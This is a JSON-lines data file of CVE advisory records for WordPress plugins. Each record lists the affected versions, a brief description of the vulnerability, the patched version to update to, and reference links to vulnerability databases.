{"CVE_ID":"CVE-2024-13442","slug":"sf-booking","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The Service Finder Bookings plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 5.0. This is due to the plugin not properly validating a user's identity prior to (1) performing a post-booking auto-login or (2) updating their profile details (e.g. password). This makes it possible for unauthenticated attackers to (1) login as an arbitrary user if their email address is known or (2) change an arbitrary user's password, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/service-finder-service-and-business-listing-wordpress-theme\\\/15208793\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827b5482-cb42-4aaa-80b5-3d0143fcead8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/827b5482-cb42-4aaa-80b5-3d0143fcead8?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0830","slug":"wp-comment-fields","versionEndExcluding":"5.1","description":"The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0. This is due to missing or incorrect nonce validation on several ajax actions. This makes it possible for unauthenticated attackers to invoke those actions via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. As a result, they may modify comment form fields and update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8ea53b11-37fa-4c45-a158-5a7709b842fc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0829","slug":"wp-comment-fields","versionEndExcluding":"5.1","description":"The Comments Extra Fields For Post,Pages and CPT plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 5.0. This is due to missing or incorrect capability checks on several ajax actions. This makes it possible for authenticated attackers, with subscriber access or higher, to invoke those actions. As a result, they may modify comment form fields and update plugin settings.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cc5754c2-a052-41ac-af19-7c4f55860f95?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-comment-fields\\\/trunk\\\/classes\\\/admin.class.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3040734%40wp-comment-fields%2Ftrunk&old=3039523%40wp-comment-fields%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6844","slug":"iframe","versionImpact":"5.0","versionEndExcluding":"5.1","description":"The iframe plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcode(s) in all versions up to and including 5.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c16e16dc-8888-4222-862f-a57a9f14e7f4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c16e16dc-8888-4222-862f-a57a9f14e7f4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L37\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L37\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/iframe\\\/trunk\\\/iframe.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089839%40iframe%2Ftrunk&old=3036990%40iframe%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3089839%40iframe%2Ftrunk&old=3036990%40iframe%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12622","slug":"wordpress-simple-paypal-shopping-cart","versionImpact":"5.0.7","versionEndExcluding":"5.0.8","description":"The WordPress Simple Shopping Cart plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_cart_button' and 'wp_cart_display_product' shortcodes in all versions up to, and including, 5.0.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/includes\\\/wpsc-shortcodes-related.php#L3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/includes\\\/wpsc-shortcodes-related.php#L3\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L11\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L11\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L49\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L49\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L5\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wordpress-simple-paypal-shopping-cart\\\/tags\\\/5.0.7\\\/wp_shopping_cart_shortcodes.php#L5\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210506\\\/wordpress-simple-paypal-shopping-cart\\\/trunk\\\/includes\\\/wpsc-shortcodes-related.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3210506\\\/wordpress-simple-paypal-shopping-cart\\\/trunk\\\/includes\\\/wpsc-shortcodes-related.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adfba556-6a96-4836-af0f-39c214099481?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/adfba556-6a96-4836-af0f-39c214099481?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4135","slug":"wp-latest-posts","versionImpact":"5.0.7","versionEndExcluding":"5.0.8","description":"The WP Latest Posts plugin for WordPress is vulnerable to arbitrary shortcode execution in all versions up to, and including, 5.0.7. This is due to the plugin allowing users to execute an action that does not properly validate a user-supplied value prior to using that value in a call to do_shortcode. This makes it possible for unauthenticated attackers to execute arbitrary shortcodes.","recommendation":"Update to version 5.0.8, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57d90ba7-b655-4655-981c-548ff96c3bb7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/57d90ba7-b655-4655-981c-548ff96c3bb7?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081119\\\/wp-latest-posts\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081119\\\/wp-latest-posts\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8432","slug":"webba-booking-lite","versionImpact":"5.0.48","versionEndExcluding":"5.0.50","description":"The Appointment & Event Booking Calendar Plugin \u2013 Webba Booking plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_appearance() function in all versions up to, and including, 5.0.48. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify the booking form's CSS.","recommendation":"Update to version 5.0.50, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b33b77-2e72-4959-bdce-646e968f2a73?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/23b33b77-2e72-4959-bdce-646e968f2a73?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webba-booking-lite\\\/tags\\\/5.0.48\\\/includes\\\/class-wbk-request-manager.php#L1986\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/webba-booking-lite\\\/tags\\\/5.0.48\\\/includes\\\/class-wbk-request-manager.php#L1986\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152926\\\/webba-booking-lite\\\/trunk\\\/includes\\\/class-wbk-request-manager.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152926\\\/webba-booking-lite\\\/trunk\\\/includes\\\/class-wbk-request-manager.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-5449","slug":"wp-dark-mode","versionImpact":"5.0.4","versionEndExcluding":"5.0.5","description":"The WP Dark Mode \u2013 WordPress Dark Mode Plugin for Improved Accessibility, Dark Theme, Night Mode, and Social Sharing plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the wpdm_social_share_save_options function in all versions up to, and including, 5.0.4. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugin's settings.","recommendation":"Update to version 5.0.5, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7d20733-d61b-4b2f-8597-528644f0bc26?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d7d20733-d61b-4b2f-8597-528644f0bc26?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dark-mode\\\/trunk\\\/includes\\\/modules\\\/social-share\\\/class-social-share.php#L581\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-dark-mode\\\/trunk\\\/includes\\\/modules\\\/social-share\\\/class-social-share.php#L581\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096290\\\/wp-dark-mode\\\/trunk?contextall=1&old=3073245&old_path=%2Fwp-dark-mode%2Ftrunk\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3096290\\\/wp-dark-mode\\\/trunk?contextall=1&old=3073245&old_path=%2Fwp-dark-mode%2Ftrunk\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6559","slug":"mw-wp-form","versionEndExcluding":"5.0.4","description":"The MW WP Form plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 5.0.3. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d555c-9bbd-42f5-8020-ccfc18755a79?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/412d555c-9bbd-42f5-8020-ccfc18755a79?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007879\\\/mw-wp-form\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3007879\\\/mw-wp-form\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3238","slug":"superfly-menu","versionImpact":"5.0.29","versionEndExcluding":"5.0.30","description":"The WordPress Menu Plugin \u2014 Superfly Responsive Menu plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 5.0.29. This is due to missing or incorrect nonce validation on the ajax_handle_delete_icons() function. This makes it possible for unauthenticated attackers to delete arbitrary files via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. Please note that the CSRF was patched in 5.0.28; however, adequate directory traversal protection wasn't introduced until 5.0.30.","recommendation":"Update to version 5.0.30, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3608fce3-0869-4516-ae08-68108f733c37?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/3608fce3-0869-4516-ae08-68108f733c37?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/superfly-responsive-wordpress-menu-plugin\\\/8012790\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/superfly-responsive-wordpress-menu-plugin\\\/8012790\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-3225","slug":"float-menu","versionEndExcluding":"5.0.3","description":"The Float menu WordPress plugin before 5.0.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c76d0f4-2ea8-433d-afb2-e35e45630899\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/3c76d0f4-2ea8-433d-afb2-e35e45630899\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12505","slug":"trackserver","versionImpact":"5.0.2","versionEndExcluding":"5.0.3","description":"The Trackserver plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'tsmap' shortcode in all versions up to, and including, 5.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 5.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L281\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L281\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L46\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L46\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L57\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/trackserver\\\/trunk\\\/class-trackserver-shortcode.php#L57\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219730%40trackserver&new=3219730%40trackserver&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3219730%40trackserver&new=3219730%40trackserver&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ade911-f9e7-4b1c-87c8-78e7664feff7?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/63ade911-f9e7-4b1c-87c8-78e7664feff7?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5348","slug":"woocommerce-catalog-enquiry","versionImpact":"5.0.2","versionEndExcluding":"5.0.3","description":"The Product Catalog Mode For WooCommerce WordPress plugin before 5.0.3 does not properly authorize settings updates or escape settings values, leading to stored XSS by unauthenticated users.","recommendation":"Update to version 5.0.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b37b09c1-1b53-471c-9b10-7d2d05ae11f1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/b37b09c1-1b53-471c-9b10-7d2d05ae11f1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-34001","slug":"hide-my-wp","versionImpact":"5.0.25","versionEndExcluding":"5.0.26","description":"Improper Restriction of Excessive Authentication Attempts vulnerability in WPPlugins \u2013 WordPress Security Plugins Hide My WP Ghost allows Functionality Bypass. This issue affects Hide My WP Ghost: from n\/a through 5.0.25.","recommendation":"Update to version 5.0.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hide-my-wp\\\/wordpress-hide-my-wp-ghost-security-plugin-plugin-5-0-24-captcha-bypass-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/hide-my-wp\\\/wordpress-hide-my-wp-ghost-security-plugin-plugin-5-0-24-captcha-bypass-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13473","slug":"ltl-freight-quotes-worldwide-express-edition","versionImpact":"5.0.20","versionEndExcluding":"5.0.21","description":"The LTL Freight Quotes \u2013 Worldwide Express Edition plugin for WordPress is vulnerable to SQL Injection via the 'dropship_edit_id' and 'edit_id' parameters in all versions up to, and including, 5.0.20 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","recommendation":"Update to version 5.0.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L264\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L264\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L387\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ltl-freight-quotes-worldwide-express-edition\\\/trunk\\\/warehouse-dropship\\\/wild\\\/includes\\\/wwe-ltl-wild-delivery-save.php#L387\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215844%40ltl-freight-quotes-worldwide-express-edition&new=3215844%40ltl-freight-quotes-worldwide-express-edition&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3215844%40ltl-freight-quotes-worldwide-express-edition&new=3215844%40ltl-freight-quotes-worldwide-express-edition&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e72828e-a6f6-43fc-8a10-d9908004c0fc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e72828e-a6f6-43fc-8a10-d9908004c0fc?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4537","slug":"hide-my-wp","versionImpact":"5.0.18","versionEndExcluding":"5.0.20","description":"The Hide My WP Ghost \u2013 Security Plugin plugin for WordPress is vulnerable to IP Address Spoofing in versions up to, and including, 5.0.18. This is due to insufficient restrictions on where the IP Address information is being retrieved for request logging and login restrictions. Attackers can supply the X-Forwarded-For header with a different IP Address that will be logged and can be used to bypass settings that may have blocked out an IP address from logging in.","recommendation":"Update to version 5.0.20, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.0.18\\\/models\\\/Brute.php#L131\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/tags\\\/5.0.18\\\/models\\\/Brute.php#L131\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf89f94-587a-4fed-a6e4-3876b7dbc9ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4cf89f94-587a-4fed-a6e4-3876b7dbc9ba?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/trunk\\\/models\\\/Brute.php#L132\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/hide-my-wp\\\/trunk\\\/models\\\/Brute.php#L132\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2320","slug":"cf7-google-sheets-connector","versionImpact":"5.0.1","versionEndExcluding":"5.0.2","description":"The CF7 Google Sheets Connector WordPress plugin before 5.0.2, cf7-google-sheets-connector-pro WordPress plugin through 5.0.2 does not escape a parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f17ccbaa-2fcd-4f17-a4da-73f2bc8a4fe9\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f17ccbaa-2fcd-4f17-a4da-73f2bc8a4fe9\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2362","slug":"float-menu","versionEndExcluding":"5.0.2","description":"The Float menu WordPress plugin before 5.0.2, Bubble Menu WordPress plugin before 3.0.4, Button Generator WordPress plugin before 2.3.5, Calculator Builder WordPress plugin before 1.5.1, Counter Box WordPress plugin before 1.2.2, Floating Button WordPress plugin before 5.3.1, Herd Effects WordPress plugin before 5.2.2, Popup Box WordPress plugin before 2.2.2, Side Menu Lite WordPress plugin before 4.0.2, Sticky Buttons WordPress plugin before 3.1.1, Wow Skype Buttons WordPress plugin before 4.0.2, WP Coder WordPress plugin before 2.5.6 do not escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/27e70507-fd68-4915-88cf-0b96ed55208e\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-7444","slug":"loginpress-pro","versionImpact":"5.0.1","versionEndExcluding":"5.0.2","description":"The LoginPress Pro plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 5.0.1. This is due to insufficient verification on the user being returned by the social login token. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email and the user does not have an already-existing account for the service returning the token.","recommendation":"Update to version 5.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/loginpress.pro\\\/changelog\\\/\",\"name\":\"https:\\\/\\\/loginpress.pro\\\/changelog\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcb3af-0b27-4442-aca0-58626b68f0d9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/80fcb3af-0b27-4442-aca0-58626b68f0d9?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6316","slug":"mw-wp-form","versionImpact":"5.0.1","versionEndExcluding":"5.0.2","description":"The MW WP Form plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the '_single_file_upload' function in versions up to, and including, 5.0.1. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 5.0.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2c03142-be30-4173-a140-14d73a16dd2b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b2c03142-be30-4173-a140-14d73a16dd2b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mw-wp-form\\\/tags\\\/5.0.1\\\/classes\\\/models\\\/class.file.php#L60\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/mw-wp-form\\\/tags\\\/5.0.1\\\/classes\\\/models\\\/class.file.php#L60\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003065\\\/mw-wp-form#file15\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3003065\\\/mw-wp-form#file15\",\"refsource\":\"\",\"tags\":[]}]"}
